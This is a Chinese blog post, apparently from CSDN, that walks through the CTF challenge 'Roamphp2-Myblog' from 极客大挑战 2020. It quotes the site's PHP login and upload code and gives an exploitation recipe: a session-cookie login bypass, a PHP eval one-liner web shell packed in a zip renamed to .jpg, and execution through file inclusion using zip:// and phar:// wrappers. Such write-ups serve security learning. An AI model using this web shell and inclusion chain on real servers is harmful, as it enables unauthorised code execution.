[极客大挑战 2020]Roamphp2-Myblog

已于 2024-06-22 14:53:42 修改
阅读量336 收藏 5
点赞数 7
文章标签: android
于 2024-06-22 14:40:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/daimakunnanhu/article/details/139881772
版权

又来喽

经过一番测试,发现文件包含,使用伪协议读取文件

例:php://filter/read=convert.base64-encode/resource=login

//这里我只写php部分
//login.php
<?php
require_once("secret.php");
mt_srand($secret_seed);
$_SESSION['password'] = mt_rand();
?>
// admin/user
<?php
error_reporting(0);
session_start();
$logined = false;
if (isset($_POST['username']) and isset($_POST['password'])){
	if ($_POST['username'] === "Longlone" and $_POST['password'] == $_SESSION['password']){  // No one knows my password, including myself
		$logined = true;
		$_SESSION['status'] = $logined;
	}
}
if ($logined === false && !isset($_SESSION['status']) || $_SESSION['status'] !== true){
    echo "<script>alert('username or password not correct!');window.location.href='index.php?page=login';</script>";
	die();
}
?>

<?php
		if(isset($_FILES['Files']) and $_SESSION['status'] === true){
			$tmp_file = $_FILES['Files']['name'];
			$tmp_path = $_FILES['Files']['tmp_name'];
			if(($extension = pathinfo($tmp_file)['extension']) != ""){
				$allows = array('gif','jpeg','jpg','png');
				if(in_array($extension,$allows,true) and in_array($_FILES['Files']['type'],array_map(function($ext){return 'image/'.$ext;},$allows),true)){
						$upload_name = sha1(md5(uniqid(microtime(true), true))).'.'.$extension;
						move_uploaded_file($tmp_path,"assets/img/upload/".$upload_name);
						echo "<script>alert('Update image -> assets/img/upload/${upload_name}') </script>";
				} else {
					echo "<script>alert('Update illegal! Only allows like \'gif\', \'jpeg\', \'jpg\', \'png\' ') </script>";
				}
			}
		}
	  ?>

secret.php源码大家自己读取

 总结,登录需要密码,session是随机,又要session与密码一致,所以需要不正常的手段。

抓取数据包,删除cookie里的session,服务器接受session为空,在将password发送为空即可

登录成功。接下来进入后台,看源码很明显,文件上传。根据此文件上传的源码,应该是图片码一类,配合文件包含,获取权限。

因为url会自动添加上.php。在此可以用%23绕过。 这里不知道为什么不能直接上传图片码。需要用到伪协议zip,phar(挺无语的。。。。)

流程:

创建1.php,写入<?= eval($_POST['a']);?>,保存

将1.php,压缩成1.zip

将1.zip重命名1.jpg

使用zip伪协议访问即可

index.php?page=zip://./assets/img/upload/c4cd8ea581dec23916217d8c9a7f21cd391d7eea.jpg%231

也可以使用phar

phar://./assets/img/upload/87b56d17c598f9ca25fc1b5a7fb604911f13b78c.jpg/1

希望大佬们指教

不会编程的崽
关注
  • 7
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[挑战 2020]Roamphp2-Myblog - 伪协议+文件上传+(LFI&ZIP)||(LFI&Phar)【***】
oZuoShen123的博客
10-09 367
1、点击login,进入登录界面,用户名在首页提示了是longlone,密码未知,无法登录。 2、点击其他地方,发现没有什么线索,唯一有的只有page这个参数。 3、题目描述:Do you know the PHP pseudo-protocol? —— 意思就是跟伪协议有关系 关键代码:
CTF网络安全题目个人导航【持续更新】
oZuoShen123的博客
10-11 926
个人整理
[挑战 2020]Roamphp 1、2、4
shinygod的博客
04-05 1760
知识点:数组绕过加密 Roamphp1-Welcome <?php error_reporting(0); if ($_SERVER['REQUEST_METHOD'] !== 'POST') { header("HTTP/1.1 405 Method Not Allowed"); exit(); } else { if (!isset($_POST['roam1']) || !isset($_POST['roam2'])){ show_source(__FILE
[挑战 2020]
qq_62046696的博客
09-18 528
可以看到,他设置了白名单,但我想传一句话木马上去,而且上传成功的话他会告诉你上传的路径,然后再用之前可以传的page参数可以解析伪协议的,但是并不确定是否可以php文件也会被解析,先不想那么多,做来看。坚定了我传木马的决心,这里想到了将php文件打包成zip,改后缀名为jpg,再利用zip伪协议进行读取。整体看下来,要执行check过滤函数,我们就需要执行,waf的else部分,然后过滤掉了php、eval可以用PHP短标签进行绕过,比如。请求方式有误,比如应该用GET请求方式的资源,用了POST。
2020挑战web部分复现
re1wn
12-08 6770
2020挑战web部分复现
buu-day08
anwen12的博客
01-05 565
又是早起刷题的一天 0x01 [FBCTF2019]Products Manager sql约束注入 在插入数据的时候,如果字段设置了应该插入的字符串长度,那么在添加的时候,如果有超过该长度的,就会被截断 mysql字符串比较 mysql == `mysql空格空格空格空格空格空格空格空格空格空格 可以看到sql的每个字段都进行了长度限制,并且在最后的位置并没有进行代码上的处理而是直接插入。所以,我们就可以开始操作了。 插入 name: facebook .
buuctf刷题12(zip://包含& 取反+无参数rce & csrf & FFI扩展安全)
weixin_63231007的博客
02-19 1178
[挑战 2020] Roamphp 1、2、4 rceme、5、6 flagshop、7 & 鹏程杯-简单的php
BUU刷题记录——7
weixin_43610673的博客
02-20 3337
[b01lers2020]Space Noodles 根据页面提示,POST访问 按照提示访问最后拼接字符串即可 [网鼎杯 2020 半决赛]faka 关键字:未授权,任意文件读取 /admin 进入后台登录页面 下载源码审计,由于已经发现了后台地址,先查看application/admin/controller/Index.php,看看能否以admin身份登录 可以看到pass()方法中有着诸多验证项,而下面的info()并无要求 未登录无session,id不传值得话就可以进入if语句,跟进_fo
标记:标记-标记系统
02-03
标记-标记系统 设置服务器 npm install -g gitinspector npm install -g eslint npm install nano --save npm install couch-admin --save npm install pouchdb --save npm install --save pouchdb-find npm...
hugo-geekblog:雨果主题博
05-11
Geekblog是个人博的简单Hugo主题。 它被故意设计为快速而精简的主题,可能不适合复杂网站的要求。 如果需要功能更完整的主题,则可以找到很多替代方案。 您可以在找到演示和完整文档。 构建和发布过程 ...
微信小程序-学院.zip
04-14
你可以使用双大括号`{{ }}`将变量插入到WXML中,而这些变量的值是在JS中动态更新的。 3. **网络请求**:微信小程序提供了wx.request接口,用于向服务器发送HTTP请求,获取在线小说的数据。 4. **组件化开发**:...
oh-my-zsh 安装脚本 install.sh
09-02
zsh 虽然强大,但是配置很复杂,起初只有才在用。直到有了 oh-my-zsh ,只需要简单的安装配置就可以使用 zsh 的各自功能。
天池Apache Flink挑战赛-垃圾图片分类算法源码+项目说明.zip
01-28
2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,作为参考资料学习借鉴。 3、本资源作为“参考资料”如果需要实现其他功能,需要能看懂代码,并且热爱钻研,自行调试。 天池...
Android12上实现双以太网卡共存同时访问外网
hxHardway的博客
07-09 53
修改main 表优先级到9999, 作用:eth1 eth1 访问。不去teardown 低分数网线。
2024-7-9 Windows NDK,Clion,C4droid 编译环境配置(基础|使用命令编译,非AndroidStudio),小白(记录)友好型教程
qq_37567841的博客
07-09 411
2024-7-9 Windows NDK,Clion,C4droid 编译环境配置(基础|使用命令编译,非AndroidStudio),小白(记录)友好型教程
Laravel Excel导出功能:高效实现数据导出
liuxin33445566的博客
07-08 1010
Laravel Excel导出功能允许开发者将查询结果或其他数据集合转换成Excel格式的文件。这不仅可以提高数据交换的效率,还可以提升用户体验。Laravel Excel支持自定义导出格式,包括自定义单元格样式、合并单元格、添加图片等。这可以通过实现WithEvents等接口来实现。
Android11 窗口动画
最新发布
littleyards的博客
07-09 524
首先创建LocalAnimationAdapter对象,LocalAnimationAdapter对象中的mSpec成员是WindowAnimationSpec对象,WindowAnimationSpec对象中的mAnimation成员是上一步创建的Animation 对象。首先创建leash图层,然后调用LocalAnimationAdapter的startAnimation继续处理,注意传入的mInnerAnimationFinishedCallback参数,后续动画完成后会回调里面的方法。
Android基础知识
double222222的博客
07-06 729
答:ContentProvider是应用程序间数据共享的接口。使用时定义一个类继承ContentProvider,复写query、insert、update、delete等方法。同时需要在manifest中注册,通过uri将数据共享出去。访问者实现ContentResolver来访问。
buuctf 挑战2019php
08-24
- *2* *3* [【BUUCTF-Web】 [挑战 2019]PHP](https://blog.csdn.net/m0_51683653/article/details/126693573)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值